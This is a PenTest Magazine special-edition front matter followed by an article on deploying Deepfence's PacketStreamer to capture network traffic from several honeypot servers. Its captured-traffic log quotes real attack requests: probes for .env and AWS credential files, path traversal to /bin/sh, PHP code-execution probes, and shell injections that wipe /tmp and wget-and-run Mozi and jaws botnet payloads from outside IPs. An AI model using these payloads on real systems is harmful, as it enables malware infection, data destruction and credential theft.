EDITORIAL TEAM

Managing Editors

Bartłomiej Adach bartek.adach@pentestmag.com

Bruno Zwierz bruno.zwierz@pentestmag.com

Proofreaders & Betatesters

Amit Chugh, Da Co, David Michaud, Diane Barrett, Gabriel Carvalhaes, Hammad Arshed, Jaimandeep Singh, Jordan M.
Bonagura, Matthew Sabin, Nasreddine Bencherchali, Paul Mellen, Pradeep Mishra, Serge Laoun, Tom Updegrove

Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their assistance there would not be
a PenTest Magazine.

Senior Consultant/Publisher

Paweł Marciniak

CEO

Joanna Kretowicz

joanna.kretowicz@pentestmag.com

DTP

Bruno Zwierz

bruno.zwierz@pentestmag.com

COVER DESIGN

Hiep Nguyen Duc

PUBLISHER

Hakin9 Media Sp. z o.o.


02-676 Warszawa

ul. Postępu 17D 

Phone: 1 917 338 3631 

www.pentestmag.com

All trademarks, trade names, or logos mentioned or used are the property of their respective owners.

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.

1
Dear PenTest Readers,

We would like to present you with a special edition, composed with the highlights of the articles
published in our monthly magazine issues in 2022. If you’re looking for the synthesis of the write-ups
that received the best reviews among our readers - here it is!

In “Best of 2022” you will read the top-notch articles on the most relevant topics in the recent months.
All of this practical knowledge, presented by the experts in their areas, will still be very helpful in 2023.

Inside you will read about Android Pentesting, Windows Privilege Escalation, WiFi Pentesting tools,
internal penetration tests, online games vulnerabilities, cloud security, OT/ICS cybersecurity monitoring,
and much more!

This is certainly a condensed compendium of practical cybersecurity tools, techniques, tips, and tricks.
Covering a really wide range of topics, every reader is going to be provided with some real treat here.

Without further ado,

Enjoy the content!

PenTest Magazine’s Editorial Team

2
Contents
Android Application Pentest
Gabrielle Botbol 4

ETW vs Sysmon Against C2 Servers

Damon Mohammedbeger 22

WiFi Pentesting with Airodump-ng

Juan Morales 37

Understanding Office Trusted Locations Workflow and How It

Can be Exploited
Adam Maraziti 48

Play to Earn or Insecure to Play?

Marlon Fabiano 66

Cybersecurity Compliance on Cloud

Almu Gómez Sánchez-Paulete 85

Wide-area Packet Capture with PacketStreamer

Owen Garrett 97
Building Intuition into Monitoring for OT/ICS Security
Danielle Jablanski 103

Windows Privilege Escalation:


The Concepts of Hijacking Execution Flow
Jill Kamperides 109

Introduction to Internal Penetration Tests

Dimitris Pallis 116
 Wide-area Packet Capture with PacketStreamer

Wide-area Packet Capture with

PacketStreamer
Owen Garrett, Deepfence
Owen is a software engineer and product manager, and leads products
and community at Deepfence Inc, an open-source security observability
provider. At Deepfence, Owen is driving the creation of a set of open
source “Security Observability” platform tools. PacketStreamer and
SecretScanner are quick and effective tools, and ThreatMapper is a
broader security platform for security professionals to find weaknesses
in their production applications.  Prior to Deepfence, Owen led products
at NGINX. During that time, NGINX grew to be one of the most widely-
deployed open source projects, securing over 500m websites and
forming the core of countless ecosystem projects.

Owen lives in Cambridge, UK, and can be found at  https://

www.linkedin.com/in/owengarrett/

PacketStreamer is an open source project from Deepfence. It performs distributed

packet capture (tcpdump-like) and aggregates the pcap data in a single pcap file.
PacketStreamer supports a wide range of environments, including Kubernetes
nodes, Docker hosts, Fargate instances and, of course, virtual and bare-metal
servers.

PacketStreamer performs distributed packet capture and central aggregation

4
 Wide-area Packet Capture with PacketStreamer

Network packet capture is a well understood practice. The basic technology that modern tools are built on first
appeared in a tool named ‘tcpdump’, released in 1988, and the associated file format (pcap) has stood the test
of time.

Although the technology has changed little, modern compute environments are very different from the single-
Unix-server assumptions that defined the design of tcpdump. Modern environments are cloud-based,
distributed across many servers, and use virtualization technologies that make it difficult to run kernel tools
such as tcpdump directly.

PacketStreamer applies contemporary network capture to modern, cloud-native environments. It captures

traffic from large numbers of remote servers (for example, cloud nodes) and collects that traffic in one place. It
supports modern stacks, such as Kubernetes (via a daemonset), Docker, and AWS Fargate, as well as standard
hosts.

Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple
machines for central logging and analysis:

• Debugging: intermittent errors are happening and your log files don’t reveal enough details. You need to
gather network traffic to see what requests your servers are processing.

• Forensics: you want to capture traffic to sensitive services for storage and later inspection in the event of an
investigation.

• Threat hunting: you want to identify any unusual behavior that may indicate the presence of adversaries.

• Machine learning: you need to capture large volumes of network traffic from many production servers to train
machine learning engines to recognize normal and anomalous traffic.

Getting Started with PacketStreamer

We’ll share a walkthrough of building, installing and running PacketStreamer, and see what we find.

We’ll start with four cloud servers. Three are honeypot servers, running WordPress, a simple NGINX hello-world,
and honeydb.io. The fourth will be our receiver server where we aggregate and analyze the packet data.

Build PacketStreamer

On the build (receiver) server, let’s clone the source and build PacketStreamer. It’s a standalone Golang app,
and we’ll statically-link the build to make it as portable as possible:

# install the necessary build tools (Debian/Ubuntu; other OSs will differ)

sudo apt install -y build-essential golang-go libpcap-dev

5
 Wide-area Packet Capture with PacketStreamer

# Get the source (github) and build a statically-linked binary

git clone https://github.com/deepfence/PacketStreamer.git

cd PacketStreamer/

make STATIC=1

# verify we have a statically-linked binary

file packetstreamer

packetstreamer: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),

statically linked, for GNU/Linux 3.2.0, not stripped

Deploy the receiver

In one terminal on the receiver server, let’s start the PacketStreamer receiver process and pipe the pcap output
into tshark. We can use the included receiver-stdout.yaml configuration file, which configures the receiver to
accept traffic on port 8081:

./packetstreamer receiver \

--config ./contrib/config/receiver-stdout.yaml | tshark -r - -Y http

The PacketStreamer receiver process will run quietly, waiting for connections from remote PacketStreamer
sensors. Pcap output from PacketStreamer will be piped to the tshark tool.

You could instead write the output to a file for later analysis, or even tee it to a file while watching using tshark.
That way, you can quickly spot anomalies (tshark output) and investigate the full packet dump.

Deploy the sensors

Now, let’s deploy the sensors on each of our target servers. We first need to create a simple configuration file
sensor-remote.yaml that identifies the location of the remote receiver:

output:

server:

address: 12.34.56.78

port: 8081

pcapMode: all

6
 Wide-area Packet Capture with PacketStreamer

Copy the PacketStreamer binary and the sensor-remote.yaml configuration file to each of the target servers:

scp packetstreamer sensor-remote.yaml user@wordpress:/tmp

scp packetstreamer sensor-remote.yaml user@nginx:/tmp

scp packetstreamer sensor-remote.yaml user@honeypot:/tmp

Then run the sensors on the remote machines:

ssh root@wordpress

# as root on the target machine:

/tmp/packetstreamer sensor --config /tmp/sensor-remote.yaml

Repeat for the nginx and honeypot machines.

Analyzing the results

We ran the sensors and receivers for 24 hours, looking for interesting HTTP requests (tshark -Y http) to the
target servers. We saw hundreds of drive-by attempts from dozens of different PI addresses, trying to find
unprotected secrets, find vulnerable control panel components, use injection to install malware, etc.

Requests ranged from an innocuous-looking ‘GET http://example.com/’, to much more significant

attempts; a small selection of the captured traffic is listed below (IP addresses obfuscated):

HTTP 295 GET /.env HTTP/1.1

HTTP 307 GET /.aws/credentials HTTP/1.1

HTTP 86 POST /.aws/credentials HTTP/1.1 (application/x-www-form-urlencoded)

HTTP 599 POST /boaform/admin/formLogin HTTP/1.1 (application/x-www-form-

urlencoded)

HTTP 335 GET /_ignition/execute-solution HTTP/1.1

HTTP 292 GET //robots.txt HTTP/1.1

HTTP 306 GET //.well-known/security.txt HTTP/1.1

HTTP 293 GET //sitemap.xml HTTP/1.1

HTTP 176 GET http://example.com/ HTTP/1.1

HTTP 796 GET /Rh-aD.nSuH_ HTTP/1.1

7
 Wide-area Packet Capture with PacketStreamer

HTTP 941 GET /yTHlRfsRgMPOmMR2kd4Hc765I/mC/mqqE3ohONMZfZP0WUJFGFSGhlX/j1?

KAwuc=ymn5Jdu96Iip_MOYa9.dTr3U7Yc&wpaCkwFkjcIU=0llrN&E0LYUK=cn.X2DT4AKByeQVWUK-
gOED5Vk HTTP/1.1

HTTP 416 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 (application/x-www-

form-urlencoded)

HTTP 86 POST /assets/images/get.php HTTP/1.1 (application/x-www-form-urlencoded)

HTTP 573 GET /dup-installer/main.installer.php HTTP/1.1

HTTP 296 GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.19/jaws;sh+/tmp/jaws HTTP/1.1

HTTP 302 GET /actuator/gateway/routes HTTP/1.1

HTTP 336 GET /shell?cd+/tmp;rm+-rf+*;wget+http://13.25.90.45:34416/

Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

HTTP 302 GET /.git/config HTTP/1.1

HTTP 86 POST /assets/images/go.php HTTP/1.1 (application/x-www-form-urlencoded)

HTTP 378 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

HTTP 506 POST /cgi-bin/ViewLog.asp HTTP/1.1 (application/x-www-form-

urlencoded)Continuation

HTTP 385 POST /GponForm/diag_Form?images/ HTTP/1.1

HTTP/XML 673 POST /Autodiscover/Autodiscover.xml HTTP/1.1

HTTP 307 GET /solr/admin/info/system?wt=json HTTP/1.1

HTTP 320 CONNECT 46.38.62.96:443 HTTP/1.1

HTTP 327 CONNECT t2.proxy-checks.com:443 HTTP/1.0

HTTP 391 GET /index.php?s=/Index/\think\app/

invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
HTTP/1.1

HTTP 363 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1

HTTP 307 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1

HTTP 191 GET /manager/text/list HTTP/1.1

8
 Wide-area Packet Capture with PacketStreamer

HTTP 418 GET /config/getuser?index=0 HTTP/1.1

You can store the results locally in a pcap file for more detailed, later analysis, or (feature in development) write
them to an S3 bucket. You can analyze them using any tool that can process pcap data.

Conclusion

PacketStreamer was developed by Deepfence as part of a bigger observability and security analytics product.
We’ve open-sourced it because, to the best of our knowledge, there are no existing tools that capture and
merge multiple pcap streams, and function across Kubernetes, Docker, Fargate and operating system
environments.

We’d welcome any feedback, contributions and suggestions. Please start with the PacketStreamer GitHub
repository, and feel welcome to join the Deepfence Community Slack.